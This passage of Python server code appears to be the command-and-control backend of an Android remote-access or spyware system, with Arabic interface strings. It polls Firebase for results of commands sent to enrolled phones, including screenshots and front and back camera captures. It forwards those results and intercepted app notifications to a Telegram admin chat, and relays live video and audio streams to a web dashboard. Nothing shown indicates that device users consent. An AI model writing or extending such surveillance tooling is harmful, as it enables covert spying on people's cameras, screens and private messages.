     1→  4500→# FIREBASE COMMAND RESULT LISTENER
     2→  4501→# ============================================================================
     3→  4502→
     4→  4503→async def firebase_result_listener():
     5→  4504→    """Background task: Poll Firebase for results from Android app.
     6→  4505→    ACTIVE mode - forwards results to Telegram admin."""
     7→  4506→    global _processed_results
     8→  4507→    log.info("Firebase result listener started (ACTIVE mode)")
     9→  4508→
    10→  4509→    # Clean ALL old results AND commands on startup to prevent re-processing spam
    11→  4510→    try:
    12→  4511→        log.info("Cleaning ALL stale Firebase results on startup...")
    13→  4512→        await firebase_set("results", None)
    14→  4513→        log.info("Firebase results cleaned successfully")
    15→  4514→    except Exception as exc:
    16→  4515→        log.error("Firebase results cleanup error: %s", exc)
    17→  4516→    try:
    18→  4517→        log.info("Cleaning ALL stale Firebase commands on startup...")
    19→  4518→        await firebase_set("commands", None)
    20→  4519→        log.info("Firebase commands cleaned successfully")
    21→  4520→    except Exception as exc:
    22→  4521→        log.error("Firebase commands cleanup error: %s", exc)
    23→  4522→
    24→  4523→    while polling_active:
    25→  4524→        try:
    26→  4525→            results_data = await firebase_get("results")
    27→  4526→            if not results_data:
    28→  4527→                await asyncio.sleep(3)
    29→  4528→                continue
    30→  4529→            if not isinstance(results_data, dict):
    31→  4530→                await firebase_set("results", None)
    32→  4531→                await asyncio.sleep(3)
    33→  4532→                continue
    34→  4533→
    35→  4534→            processed_any = False
    36→  4535→            for device_id, cmds in results_data.items():
    37→  4536→                if not isinstance(cmds, dict):
    38→  4537→                    continue
    39→  4538→                for cmd_id, result_entry in cmds.items():
    40→  4539→                    if not isinstance(result_entry, dict):
    41→  4540→                        continue
    42→  4541→
    43→  4542→                    result_text = result_entry.get("result", "")
    44→  4543→                    command = result_entry.get("command", cmd_id)
    45→  4544→                    status = result_entry.get("status", "completed")
    46→  4545→
    47→  4546→                    # Simple dedup by cmd_id (not content hash - prevents delete failures)
    48→  4547→                    result_key = f"{device_id}:{cmd_id}"
    49→  4548→
    50→  4549→                    if result_key in _processed_results:
    51→  4550→                        continue
    52→  4551→
    53→  4552→                    # === FORWARD RESULT TO TELEGRAM ===
    54→  4553→                    try:
    55→  4554→                        d = find_device(device_id)
    56→  4555→                        dev_name = d.get("name", device_id) if d else device_id
    57→  4556→
    58→  4557→                        # Try to parse result as JSON for better formatting and image detection
    59→  4558→                        result_json_parsed = None
    60→  4559→                        b64_image = None
    61→  4560→                        display_text = str(result_text) if result_text else "تم بنجاح"
    62→  4561→                        if len(display_text) > 4000:
    63→  4562→                            display_text = display_text[:4000] + "..."
    64→  4563→
    65→  4564→                        try:
    66→  4565→                            result_json_parsed = json.loads(str(result_text))
    67→  4566→                            if isinstance(result_json_parsed, dict):
    68→  4567→                                # Check for base64 image in result (screenshots, cameras)
    69→  4568→                                for img_key in ("base64", "base64_preview", "image", "image_data"):
    70→  4569→                                    img_val = result_json_parsed.get(img_key, "")
    71→  4570→                                    if img_val and len(img_val) > 1000:
    72→  4571→                                        b64_image = img_val
    73→  4572→                                        break
    74→  4573→                                if result_json_parsed.get("ok") and result_json_parsed.get("message"):
    75→  4574→                                    display_text = result_json_parsed["message"]
    76→  4575→                                elif result_json_parsed.get("ok") and result_json_parsed.get("data") is not None:
    77→  4576→                                    data = result_json_parsed["data"]
    78→  4577→                                    if isinstance(data, list):
    79→  4578→                                        count = len(data)
    80→  4579→                                        if count == 0:
    81→  4580→                                            display_text = "لا توجد بيانات"
    82→  4581→                                        elif count <= 15:
    83→  4582→                                            display_text = f"تم بنجاح - {count} عنصر\n\n<code>{json.dumps(data, ensure_ascii=False, indent=2)[:3000]}</code>"
    84→  4583→                                        else:
    85→  4584→                                            items_str = json.dumps(data[:10], ensure_ascii=False, indent=2)[:2000]
    86→  4585→                                            display_text = f"تم بنجاح - {count} عنصر (أول 10)\n\n<code>{items_str}</code>\n\n...و {count-10} أخرى"
    87→  4586→                                    elif isinstance(data, dict):
    88→  4587→                                        display_text = json.dumps(data, ensure_ascii=False, indent=2)[:3000]
    89→  4588→                        except Exception:
    90→  4589→                            pass
    91→  4590→
    92→  4591→                        cmd_desc = command or cmd_id
    93→  4592→                        for reg_name, reg_info in COMMAND_REGISTRY.items():
    94→  4593→                            if reg_info.get("cmd") == command:
    95→  4594→                                cmd_desc = reg_info.get("desc", command)
    96→  4595→                                break
    97→  4596→
    98→  4597→                        if status in ("completed", "success"):
    99→  4598→                            emoji = "\u2705"
   100→  4599→                        elif status == "error":
   101→  4600→                            emoji = "\u274c"
   102→  4601→                        else:
   103→  4602→                            emoji = "\U0001f4cb"
   104→  4603→
   105→  4604→                        # Try to EDIT the pending message first (or send new)
   106→  4605→                        pending = _pending_messages.pop(cmd_id, None)
   107→  4606→                        batch_id = pending.get("batch_id") if pending else None
   108→  4607→
   109→  4608→                        # === Send image directly for screenshots/camera ===
   110→  4609→                        img_sent = False
   111→  4610→                        if b64_image and command in ("screenshot", "front_camera", "back_camera"):
   112→  4611→                            try:
   113→  4612→                                import base64 as _b64
   114→  4613→                                img_bytes = _b64.b64decode(b64_image)
   115→  4614→                                if len(img_bytes) > 5000:  # Only send if meaningful size
   116→  4615→                                    caption = f"{emoji} {dev_name} - {cmd_desc}"
   117→  4616→                                    photo_resp = await send_photo(ADMIN_CHAT_ID, img_bytes, caption=caption)
   118→  4617→                                    if photo_resp and photo_resp.get("ok"):
   119→  4618→                                        img_sent = True
   120→  4619→                                        log.info("Sent result as PHOTO: cmd=%s device=%s size=%d", cmd_id, device_id, len(img_bytes))
   121→  4620→                            except Exception as img_err:
   122→  4621→                                log.warning("Failed to send result as photo for cmd=%s: %s", cmd_id, img_err)
   123→  4622→
   124→  4623→                        # Build text message
   125→  4624→                        msg = (
   126→  4625→                            f"{emoji} <b>نتيجة الأمر</b>\n\n"
   127→  4626→                            f"\U0001f4f1 الجهاز: <code>{dev_name}</code>\n"
   128→  4627→                            f"\U0001f4cb الأمر: {cmd_desc}\n"
   129→  4628→                            f"\U0001f194 المعرف: <code>{cmd_id}</code>\n\n"
   130→  4629→                            f"<code>{display_text}</code>"
   131→  4630→                        )
   132→  4631→
   133→  4632→                        # If image was sent, keep text shorter
   134→  4633→                        if img_sent:
   135→  4634→                            msg = f"{emoji} <b>{cmd_desc}</b>\n\U0001f4f1 <code>{dev_name}</code>\n\n<code>{display_text[:2000]}</code>"
   136→  4635→
   137→  4636→                        msg_sent = False
   138→  4637→                        if pending and pending.get("message_id"):
   139→  4638→                            try:
   140→  4639→                                edit_resp = await edit_message_text(
   141→  4640→                                    pending["chat_id"], pending["message_id"],
   142→  4641→                                    msg, reply_markup=None
   143→  4642→                                )
   144→  4643→                                if edit_resp and edit_resp.get("ok"):
   145→  4644→                                    msg_sent = True
   146→  4645→                                    log.info("Result EDITED pending message: cmd=%s msg_id=%d", cmd_id, pending["message_id"])
   147→  4646→                                else:
   148→  4647→                                    log.warning("Edit pending message failed for cmd=%s, sending new", cmd_id)
   149→  4648→                            except Exception as edit_err:
   150→  4649→                                log.warning("Edit pending message error for cmd=%s: %s", cmd_id, edit_err)
   151→  4650→                        
   152→  4651→                        if not msg_sent:
   153→  4652→                            # For batch ops, don't flood - just update counter
   154→  4653→                            if batch_id and batch_id in _batch_operations:
   155→  4654→                                _batch_operations[batch_id]["responded"] += 1
   156→  4655→                                await update_batch_progress(batch_id)
   157→  4656→                            else:
   158→  4657→                                await send_admin(msg)
   159→  4658→                        elif batch_id and batch_id in _batch_operations:
   160→  4659→                            _batch_operations[batch_id]["responded"] += 1
   161→  4660→                            await update_batch_progress(batch_id)
   162→  4661→                        log.info("Result FORWARDED to Telegram: cmd=%s device=%s type=%s", cmd_id, device_id, command)
   163→  4662→                    except Exception as send_err:
   164→  4663→                        log.error("Failed to forward result to Telegram: %s", send_err)
   165→  4664→
   166→  4665→                    # Update local command status
   167→  4666→                    await update_command_status(cmd_id, status, result_text)
   168→  4667→                    await update_device(device_id, {"active": True})
   169→  4668→
   170→  4669→                    # === CACHE SCREENSHOT/CAMERA IMAGES FOR STREAMING ===
   171→  4670→                    if command in ("screenshot", "front_camera", "back_camera") and status in ("completed", "success"):
   172→  4671→                        try:
   173→  4672→                            result_json = json.loads(str(result_text)) if isinstance(result_text, str) else result_text
   174→  4673→                            if isinstance(result_json, dict):
   175→  4674→                                b64_data = result_json.get("base64_preview", "")
   176→  4675→                                # Cache if we have substantial base64 data (full image, not truncated)
   177→  4676→                                if len(b64_data) > 1000 and "..." not in b64_data[-5:]:
   178→  4677→                                    frame_key = f"{device_id}:video"
   179→  4678→                                    _latest_frames_module[frame_key] = {
   180→  4679→                                        "data": b64_data,
   181→  4680→                                        "timestamp": time.time(),
   182→  4681→                                        "size": result_json.get("size", len(b64_data)),
   183→  4682→                                        "source": command,
   184→  4683→                                        "stream_id": device_id,
   185→  4684→                                        "is_keyframe": True,
   186→  4685→                                        "codec": "jpeg",
   187→  4686→                                    }
   188→  4687→                                    if device_id in _jpeg_stream_info:
   189→  4688→                                        _jpeg_stream_info[device_id]["last_frame_time"] = time.time()
   190→  4689→                                        _jpeg_stream_info[device_id]["frame_count"] = _jpeg_stream_info[device_id].get("frame_count", 0) + 1
   191→  4690→                                    log.info("Cached %s result image for streaming: device=%s b64_len=%d", command, device_id, len(b64_data))
   192→  4691→                        except Exception as cache_err:
   193→  4692→                            log.error("Failed to cache screenshot result: %s", cache_err)
   194→  4693→
   195→  4694→                    # Delete the result from Firebase immediately
   196→  4695→                    try:
   197→  4696→                        validate_id(device_id, "device_id")
   198→  4697→                        validate_id(cmd_id, "cmd_id")
   199→  4698→                        await firebase_set(f"results/{device_id}/{cmd_id}", None)
   200→  4699→                    except Exception as del_err:
   201→  4700→                        log.warning("Failed to delete Firebase result %s/%s: %s", device_id, cmd_id, del_err)
   202→  4701→
   203→  4702→                    _processed_results.add(result_key)
   204→  4703→                    processed_any = True
   205→  4704→
   206→  4705→            if len(_processed_results) > 500:
   207→  4706→                _processed_results = set(list(_processed_results)[-200:])
   208→  4707→            
   209→  4708→            # Cleanup stale pending messages (older than 5 minutes)
   210→  4709→            now_ts = time.time()
   211→  4710→            stale_keys = [k for k, v in _pending_messages.items() if now_ts - v.get("created_at", 0) > 300]
   212→  4711→            for sk in stale_keys:
   213→  4712→                del _pending_messages[sk]
   214→  4713→            if stale_keys:
   215→  4714→                log.info("Cleaned %d stale pending message(s)", len(stale_keys))
   216→  4715→
   217→  4716→        except Exception as exc:
   218→  4717→            log.error("Firebase listener error: %s", exc)
   219→  4718→
   220→  4719→        # === Also clean stale Firebase commands (older than 90s, must exceed the 60s auto-delete) ===
   221→  4720→        try:
   222→  4721→            for dev in get_devices():
   223→  4722→                did = dev.get("id", "")
   224→  4723→                if not did:
   225→  4724→                    continue
   226→  4725→                fb_cmds = await firebase_get(f"commands/{did}")
   227→  4726→                if fb_cmds and isinstance(fb_cmds, dict):
   228→  4727→                    now = time.time()
   229→  4728→                    for cid, cdata in fb_cmds.items():
   230→  4729→                        if not isinstance(cdata, dict):
   231→  4730→                            continue
   232→  4731→                        try:
   233→  4732→                            validate_id(did, "device_id")
   234→  4733→                            validate_id(cid, "cmd_id")
   235→  4734→                        except ValueError:
   236→  4735→                            continue
   237→  4736→                        created = cdata.get("created_at", "")
   238→  4737→                        if created:
   239→  4738→                            try:
   240→  4739→                                from datetime import datetime as _dt2
   241→  4740→                                ts_val = _dt2.strptime(created, "%Y-%m-%d %H:%M:%S").timestamp()
   242→  4741→                                if now - ts_val > 90:
   243→  4742→                                    await firebase_set(f"commands/{did}/{cid}", None)
   244→  4743→                                    log.info("Cleaned stale Firebase command %s/%s (age=%ds)", did, cid, int(now-ts_val))
   245→  4744→                            except Exception:
   246→  4745→                                await firebase_set(f"commands/{did}/{cid}", None)
   247→  4746→                        else:
   248→  4747→                            # No timestamp - delete if we've already processed it
   249→  4748→                            await firebase_set(f"commands/{did}/{cid}", None)
   250→  4749→        except Exception as clean_err:
   251→  4750→            pass  # Don't let cleanup errors break the listener
   252→  4751→
   253→  4752→        await asyncio.sleep(3)
   254→  4753→
   255→  4754→# ============================================================================
   256→  4755→# DEVICE MONITORING LOOP
   257→  4756→# ============================================================================
   258→  4757→
   259→  4758→async def device_monitoring_loop():
   260→  4759→    """Background task: Monitor device online/offline status by checking last_seen timestamps.
   261→  4760→    Detects devices that went offline without sending an explicit offline heartbeat."""
   262→  4761→    global _device_last_online_state
   263→  4762→    log.info("Device monitoring loop started")
   264→  4763→
   265→  4764→    # Initialize tracking state from existing devices on startup
   266→  4765→    await asyncio.sleep(10)  # Wait for devices to register
   267→  4766→    for d in get_devices():
   268→  4767→        did = d.get("id", "")
   269→  4768→        if did and did not in _device_last_online_state:
   270→  4769→            _device_last_online_state[did] = d.get("active", False)
   271→  4770→            log.info("Monitor: initialized %s as %s", did, "online" if d.get("active") else "offline")
   272→  4771→
   273→  4772→    while polling_active:
   274→  4773→        try:
   275→  4774→            now = time.time()
   276→  4775→            devices = get_devices()
   277→  4776→            for d in devices:
   278→  4777→                did = d.get("id", "")
   279→  4778→                if not did:
   280→  4779→                    continue
   281→  4780→                last_seen_str = d.get("last_seen", "")
   282→  4781→                is_active = d.get("active", False)
   283→  4782→
   284→  4783→                # Parse last_seen to check if device should be considered offline
   285→  4784→                try:
   286→  4785→                    last_seen_dt = datetime.strptime(last_seen_str, "%Y-%m-%d %H:%M:%S")
   287→  4786→                    last_seen_ts = last_seen_dt.timestamp()
   288→  4787→                    time_since_seen = now - last_seen_ts
   289→  4788→                except Exception:
   290→  4789→                    time_since_seen = 999999
   291→  4790→
   292→  4791→                # If device is marked active but hasn't been seen recently, mark offline
   293→  4792→                if is_active and time_since_seen > DEVICE_OFFLINE_TIMEOUT:
   294→  4793→                    await update_device(did, {"active": False})
   295→  4794→                    # Trigger offline alert via state tracking
   296→  4795→                    was_online = _device_last_online_state.get(did, False)
   297→  4796→                    if was_online:
   298→  4797→                        _device_last_online_state[did] = False
   299→  4798→                        dev_name = d.get("name", did)
   300→  4799→                        try:
   301→  4800→                            await send_admin(
   302→  4801→                                f"🔴 <b>الجهاز غير متصل</b>\n\n"
   303→  4802→                                f"📱 {dev_name} (<code>{did}</code>)\n"
   304→  4803→                                f"⏱️ آخر ظهور: {last_seen_str}\n"
   305→  4804→                                f"🕐 {ts()}",
   306→  4805→                                disable_notification=True
   307→  4806→                            )
   308→  4807→                        except Exception:
   309→  4808→                            pass
   310→  4809→                        append_event("Device offline (timeout)", {"device_id": did})
   311→  4810→
   312→  4811→            # Cleanup stale batch operations (older than 10 minutes)
   313→  4812→            stale_batches = [k for k, v in _batch_operations.items() if now - v.get("created_at", 0) > 600]
   314→  4813→            for sb in stale_batches:
   315→  4814→                del _batch_operations[sb]
   316→  4815→
   317→  4816→        except Exception as exc:
   318→  4817→            log.error("Device monitoring error: %s", exc)
   319→  4818→
   320→  4819→        await asyncio.sleep(60)  # Check every 60 seconds
   321→  4820→
   322→  4821→
   323→  4822→# ============================================================================
   324→  4823→# SESSION CLEANUP TASK
   325→  4824→# ============================================================================
   326→  4825→
   327→  4826→async def session_cleanup_loop():
   328→  4827→    while True:
   329→  4828→        try:
   330→  4829→            sessions = load_json(SESSIONS_FILE, [])
   331→  4830→            now = datetime.now(timezone.utc)
   332→  4831→            active = []
   333→  4832→            for s in sessions:
   334→  4833→                try:
   335→  4834→                    expires = datetime.fromisoformat(s.get("expires_at", "")).replace(tzinfo=timezone.utc)
   336→  4835→                    if now <= expires:
   337→  4836→                        active.append(s)
   338→  4837→                except Exception:
   339→  4838→                    continue
   340→  4839→            save_json(SESSIONS_FILE, active)
   341→  4840→            
   342→  4841→            # Keep used codes and recent unused codes (lifetime codes)
   343→  4842→            codes = load_json(LINK_CODES_FILE, [])
   344→  4843→            used = [c for c in codes if c.get("used")]
   345→  4844→            unused = [c for c in codes if not c.get("used")]
   346→  4845→            # Keep only last 100 unused codes
   347→  4846→            if len(unused) > 100:
   348→  4847→                unused = unused[-100:]
   349→  4848→            save_json(LINK_CODES_FILE, used + unused)
   350→  4849→        except Exception:
   351→  4850→            pass
   352→  4851→        await asyncio.sleep(3600)
   353→  4852→
   354→  4853→# ============================================================================
   355→  4854→# APP FACTORY & ROUTES
   356→  4855→# ============================================================================
   357→  4856→
   358→  4857→def create_app():
   359→  4858→    app = web.Application(middlewares=[cors_middleware], client_max_size=50*1024*1024)  # 50MB for file uploads
   360→  4859→    
   361→  4860→    @web.middleware
   362→  4861→    async def log_requests(request, handler):
   363→  4862→        if request.method == "POST":
   364→  4863→            log.info("POST %s from %s (%s)", request.path, request.remote, request.headers.get("User-Agent", "")[:50])
   365→  4864→        try:
   366→  4865→            return await handler(request)
   367→  4866→        except web.HTTPNotFound:
   368→  4867→            log.warning("404 NOT FOUND: %s %s", request.method, request.path)
   369→  4868→            raise
   370→  4869→        except Exception as e:
   371→  4870→            log.error("Request error %s %s: %s", request.method, request.path, e)
   372→  4871→            raise
   373→  4872→    
   374→  4873→    # Web Dashboard
   375→  4874→    app.router.add_get("/", serve_dashboard)
   376→  4875→    app.router.add_get("/dashboard", serve_dashboard)
   377→  4876→    
   378→  4877→    # Health check endpoint (for Android app connectivity test)
   379→  4878→    async def api_health(request):
   380→  4879→        return web.json_response({
   381→  4880→            "ok": True,
   382→  4881→            "status": "running",
   383→  4882→            "version": "3.4",
   384→  4883→            "firebase": firebase_connected,
   385→  4884→            "uptime": get_uptime(),
   386→  4885→            "devices": len(get_devices()),
   387→  4886→            "commands": len(COMMAND_REGISTRY),
   388→  4887→        })
   389→  4888→    app.router.add_get("/api/health", api_health)
   390→  4889→    
   391→  4890→    # Auth API
   392→  4891→    app.router.add_post("/api/login", api_web_login)
   393→  4892→    
   394→  4893→    # Device API (no auth - device authenticates via link code/token)
   395→  4894→    app.router.add_post("/api/verify_link", api_verify_link)
   396→  4895→    app.router.add_post("/api/register", api_register)
   397→  4896→    app.router.add_get("/api/commands/{device_id}", api_get_commands)
   398→  4897→    app.router.add_get("/api/commands", api_get_commands)
   399→  4898→    app.router.add_post("/api/command_result/{command_id}", api_command_result)
   400→  4899→    app.router.add_post("/api/data/{device_id}", api_device_data)
   401→  4900→    app.router.add_post("/api/data", api_device_data_body)
   402→  4901→    app.router.add_post("/api/heartbeat", api_heartbeat)
   403→  4902→    app.router.add_get("/api/settings/{device_id}", api_device_settings)
   404→  4903→
   405→  4904→    # Device event API (receives buffered events from the app)
   406→  4905→    async def api_device_event(request):
   407→  4906→        """POST /api/event - Receive device events (notifications, monitoring, etc.)."""
   408→  4907→        global api_hits
   409→  4908→        api_hits += 1
   410→  4909→        try:
   411→  4910→            body = await request.json()
   412→  4911→            device_id = body.get("device_id", "")
   413→  4912→            event_type = body.get("event_type", "")
   414→  4913→            data = body.get("data", {})
   415→  4914→            timestamp = body.get("timestamp", time.time() * 1000)
   416→  4915→
   417→  4916→            if not device_id or not event_type:
   418→  4917→                return web.json_response({"ok": False, "error": "device_id and event_type required"}, status=400)
   419→  4918→
   420→  4919→            # Validate device token
   421→  4920→            device_token = request.headers.get("X-Device-Token", "")
   422→  4921→            if not get_device_by_token(device_id, device_token):
   423→  4922→                return web.json_response({"ok": False, "error": "Unauthorized or device not found"}, status=401)
   424→  4923→
   425→  4924→            # Append to events log
   426→  4925→            event_entry = {
   427→  4926→                "device_id": device_id,
   428→  4927→                "event_type": event_type,
   429→  4928→                "data": data,
   430→  4929→                "timestamp": timestamp,
   431→  4930→                "server_time": ts()
   432→  4931→            }
   433→  4932→
   434→  4933→            events = load_json(EVENTS_FILE, [])
   435→  4934→            events.append(event_entry)
   436→  4935→            # Keep last 1000 events
   437→  4936→            if len(events) > 1000:
   438→  4937→                events = events[-1000:]
   439→  4938→            save_json(EVENTS_FILE, events)
   440→  4939→
   441→  4940→            # Forward notification events to Telegram
   442→  4941→            if event_type == "notification" and load_settings().get("notifications", False):
   443→  4942→                title = data.get("title", "")
   444→  4943→                text = data.get("text", "")
   445→  4944→                pkg = data.get("package", "")
   446→  4945→                if title or text:
   447→  4946→                    msg = f"🔔 Device Event\n\nDevice: {device_id}\nType: {event_type}\n   package: {pkg}\n   title: {title}\n   text: {text}"
   448→  4947→                    await send_message(ADMIN_CHAT_ID, msg)
   449→  4948→
   450→  4949→            return web.json_response({"ok": True, "stored": True})
   451→  4950→        except Exception as exc:
   452→  4951→            log.error("device_event error: %s", exc)
   453→  4952→            return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
   454→  4953→
   455→  4954→    app.router.add_post("/api/event", api_device_event)
   456→  4955→    
   457→  4956→    # File upload API (for media: photos, videos, audio, screenshots)
   458→  4957→    app.router.add_post("/api/upload", api_upload_file)
   459→  4958→    app.router.add_post("/api/upload_base64", api_upload_base64)
   460→  4959→
   461→  4960→    # Public API - link code generation (no auth required for device linking)
   462→  4961→    async def api_generate_link(request):
   463→  4962→        """POST /api/link_code - Generate a new link code for device pairing."""
   464→  4963→        global api_hits
   465→  4964→        api_hits += 1
   466→  4965→        try:
   467→  4966→            body = await request.json()
   468→  4967→            # Verify the device is registered
   469→  4968→            device_id = body.get("device_id", "")
   470→  4969→            if device_id and not find_device(device_id):
   471→  4970→                return web.json_response({"ok": False, "error": "Device not registered"}, status=403)
   472→  4971→            entry = await generate_link_code()
   473→  4972→            return web.json_response({"ok": True, "code": entry["code"], "session_id": entry.get("session_id", "")})
   474→  4973→        except Exception as exc:
   475→  4974→            log.error("link_code generation error: %s", exc)
   476→  4975→            return web.json_response({"ok": False, "error": "Internal server error"}, status=500)
   477→  4976→    app.router.add_post("/api/link_code", api_generate_link)
   478→  4977→    
   479→  4978→    # Web API (requires auth)
   480→  4979→    app.router.add_get("/api/web/devices", api_web_devices)
   481→  4980→    app.router.add_get("/api/web/device/{device_id}", api_web_device_detail)
   482→  4981→    app.router.add_get("/api/web/commands", api_web_commands)
   483→  4982→    app.router.add_get("/api/web/events", api_web_events)
   484→  4983→    app.router.add_get("/api/web/stats", api_web_stats)
   485→  4984→    app.router.add_post("/api/web/send_command", api_web_send_command)
   486→  4985→    app.router.add_get("/api/web/link_code", api_web_link_code)
   487→  4986→    app.router.add_get("/api/web/settings", api_web_settings_get)
   488→  4987→    app.router.add_put("/api/web/settings", api_web_settings_set)
   489→  4988→    app.router.add_delete("/api/web/unlink/{device_id}", api_web_unlink)
   490→  4989→    app.router.add_post("/api/web/logout", api_web_logout)
   491→  4990→    
   492→  4991→    # ========== STREAMING WebSocket & REST API ==========
   493→  4992→
   494→  4993→    # In-memory store for active streams and latest frames
   495→  4994→    # Key: device_id -> {"ws": WebSocket, "streams": {...}, "last_activity": float}
   496→  4995→    _stream_connections = {}
   497→  4996→    # Key: f"{device_id}:{stream_type}" -> {"frame": base64_str, "timestamp": float, "config": dict}
   498→  4997→    _latest_frames = {}
   499→  4998→    # Key: f"{device_id}:{stream_type}" -> {"audio_chunk": base64_str, "timestamp": float}
   500→  4999→    _latest_audio = {}
   501→  5000→    # IP -> device_id mapping - use module-level _ip_device_map
   502→  5001→    # JPEG tasks use module-level _jpeg_stream_tasks_module
   503→  5002→
   504→  5003→    # STREAMS_FILE removed (was unused)
   505→  5004→
   506→  5005→    async def ws_stream(request):
   507→  5006→        """WebSocket endpoint for streaming - /ws/stream?device_id=xxx&stream_id=xxx"""
   508→  5007→        from aiohttp import WSMsgType
   509→  5008→        ws = web.WebSocketResponse(max_msg_size=10*1024*1024, heartbeat=30)  # 10MB
   510→  5009→        await ws.prepare(request)
   511→  5010→
   512→  5011→        device_id = request.query.get("device_id", "")
   513→  5012→        stream_id = request.query.get("stream_id", "")
   514→  5013→
   515→  5014→        if not device_id:
   516→  5015→            await ws.close(4001, "device_id required")
   517→  5016→            return ws
   518→  5017→
   519→  5018→        log.info("WebSocket stream connected: device=%s stream=%s", device_id, stream_id)
   520→  5019→        _stream_connections[device_id] = {"ws": ws, "stream_id": stream_id, "last_activity": time.time()}
   521→  5020→
   522→  5021→        # Update device streaming status
   523→  5022→        await update_device(device_id, {"streaming": True, "stream_id": stream_id})
   524→  5023→
   525→  5024→        try:
   526→  5025→            async for msg in ws:
   527→  5026→                if msg.type == WSMsgType.TEXT:
   528→  5027→                    try:
   529→  5028→                        data = json.loads(msg.data)
   530→  5029→                        msg_type = data.get("type", "")
   531→  5030→
   532→  5031→                        if msg_type in ("video", "audio"):
   533→  5032→                            # Store latest frame/audio for dashboard polling
   534→  5033→                            frame_key = f"{device_id}:{msg_type}"
   535→  5034→                            entry = {
   536→  5035→                                "data": data.get("data", ""),
   537→  5036→                                "timestamp": data.get("timestamp", 0),
   538→  5037→                                "size": data.get("size", 0),
   539→  5038→                                "stream_id": data.get("stream_id", ""),
   540→  5039→                                "is_keyframe": data.get("is_keyframe", False),
   541→  5040→                                "codec": data.get("codec", ""),
   542→  5041→                                "source": data.get("source", ""),
   543→  5042→                            }
   544→  5043→                            if msg_type == "video":
   545→  5044→                                _latest_frames[frame_key] = entry
   546→  5045→                            else:
   547→  5046→                                _latest_audio[frame_key] = entry
   548→  5047→
   549→  5048→                            _stream_connections[device_id]["last_activity"] = time.time()
   550→  5049→
   551→  5050→                            # Forward to any dashboard viewer WebSockets
   552→  5051→                            # Match by device_id OR exact stream_id for maximum compatibility
   553→  5052→                            for vid, vinfo in list(_stream_connections.items()):
   554→  5053→                                if vid.startswith("viewer_"):
   555→  5054→                                    target = vinfo.get("target_stream", "")
   556→  5055→                                    # Forward if viewer's target matches device_id OR stream_id
   557→  5056→                                    if target == device_id or target == stream_id:
   558→  5057→                                        try:
   559→  5058→                                            await vinfo["ws"].send_str(msg.data)
   560→  5059→                                        except Exception:
   561→  5060→                                            pass
   562→  5061→
   563→  5062→                        elif msg_type == "error":
   564→  5063→                            log.warning("Stream error from %s: %s", device_id, data.get("error", ""))
   565→  5064→
   566→  5065→                        elif msg_type == "config":
   567→  5066→                            # Stream config message - just log it
   568→  5067→                            log.debug("Stream config from %s: %s", device_id, json.dumps(data, ensure_ascii=False)[:200])
   569→  5068→
   570→  5069→                    except json.JSONDecodeError:
   571→  5070→                        pass
   572→  5071→                    except Exception as exc:
   573→  5072→                        log.error("Error processing stream message from %s: %s", device_id, exc)
   574→  5073→
   575→  5074→                elif msg.type == WSMsgType.ERROR:
   576→  5075→                    log.warning("WebSocket error from device %s", device_id)
   577→  5076→                    break
   578→  5077→                elif msg.type in (WSMsgType.CLOSED, WSMsgType.CLOSING):
   579→  5078→                    break
   580→  5079→        finally:
   581→  5080→            _stream_connections.pop(device_id, None)
   582→  5081→            await update_device(device_id, {"streaming": False, "stream_id": ""})
   583→  5082→            log.info("WebSocket stream disconnected: device=%s", device_id)
   584→  5083→
   585→  5084→        return ws
   586→  5085→
   587→  5086→    async def ws_stream_viewer(request):
   588→  5087→        """WebSocket endpoint for dashboard viewers - /ws/stream/viewer?stream_id=xxx"""
   589→  5088→        from aiohttp import WSMsgType
   590→  5089→        ws = web.WebSocketResponse(heartbeat=30)
   591→  5090→        await ws.prepare(request)
   592→  5091→
   593→  5092→        stream_id = request.query.get("stream_id", "")
   594→  5093→        if not stream_id:
   595→  5094→            await ws.close(4001, "stream_id required")
   596→  5095→            return ws
   597→  5096→
   598→  5097→        viewer_id = f"viewer_{stream_id}"
   599→  5098→        _stream_connections[viewer_id] = {"ws": ws, "target_stream": stream_id, "last_activity": time.time()}
   600→  5099→
   601→  5100→        log.info("Stream viewer connected for stream_id=%s", stream_id)
   602→  5101→
   603→  5102→        # Send any cached frames
   604→  5103→        for key, entry in _latest_frames.items():
   605→  5104→            if stream_id in key:
   606→  5105→                try:
   607→  5106→                    await ws.send_str(json.dumps({"type": "cached_frame", **entry}))
   608→  5107→                except Exception:
   609→  5108→                    break
   610→  5109→
   611→  5110→        try:
   612→  5111→            async for msg in ws:
   613→  5112→                if msg.type in (WSMsgType.CLOSED, WSMsgType.CLOSING, WSMsgType.ERROR):
   614→  5113→                    break
   615→  5114→                elif msg.type == WSMsgType.TEXT:
   616→  5115→                    try:
   617→  5116→                        data = json.loads(msg.data)
   618→  5117→                        cmd = data.get("type", "")
   619→  5118→                        if cmd in ("stop_stream", "pause_stream", "resume_stream", "request_keyframe", "config_update"):
   620→  5119→                            for did, dinfo in _stream_connections.items():
   621→  5120→                                if not did.startswith("viewer_"):
   622→  5121→                                    if did == stream_id or dinfo.get("stream_id") == stream_id:
   623→  5122→                                        try:
   624→  5123→                                            await dinfo["ws"].send_str(msg.data)
   625→  5124→                                        except Exception:
   626→  5125→                                            pass
   627→  5126→                    except Exception:
   628→  5127→                        pass
   629→  5128→        finally:
   630→  5129→            _stream_connections.pop(viewer_id, None)
   631→  5130→            log.info("Stream viewer disconnected for stream_id=%s", stream_id)
   632→  5131→
   633→  5132→        return ws
   634→  5133→
   635→  5134→    @require_auth
   636→  5135→    async def api_stream_frame(request):
   637→  5136→        """GET /api/stream/frame/{device_id}?type=video|audio - Get latest stream frame for a device"""
   638→  5137→        device_id = request.match_info.get("device_id", "")
   639→  5138→        frame_type = request.query.get("type", "video")
   640→  5139→
   641→  5140→        frame_key = f"{device_id}:{frame_type}"
   642→  5141→        # Check both local (WebSocket streams) and module-level (JPEG uploads) caches
   643→  5142→        store = _latest_frames if frame_type == "video" else _latest_audio
   644→  5143→        entry = store.get(frame_key)
   645→  5144→        if not entry:
   646→  5145→            entry = _latest_frames_module.get(frame_key)
   647→  5146→
   648→  5147→        if not entry:
   649→  5148→            return web.json_response({"ok": False, "error": "No active stream"})
   650→  5149→
   651→  5150→        return web.json_response({"ok": True, **entry})
   652→  5151→
   653→  5152→    @require_auth
   654→  5153→    async def api_stream_status(request):
   655→  5154→        """GET /api/stream/status - Get all active stream connections"""
   656→  5155→        active = {}
   657→  5156→        for did, dinfo in _stream_connections.items():
   658→  5157→            if not did.startswith("viewer_"):
   659→  5158→                active[did] = {
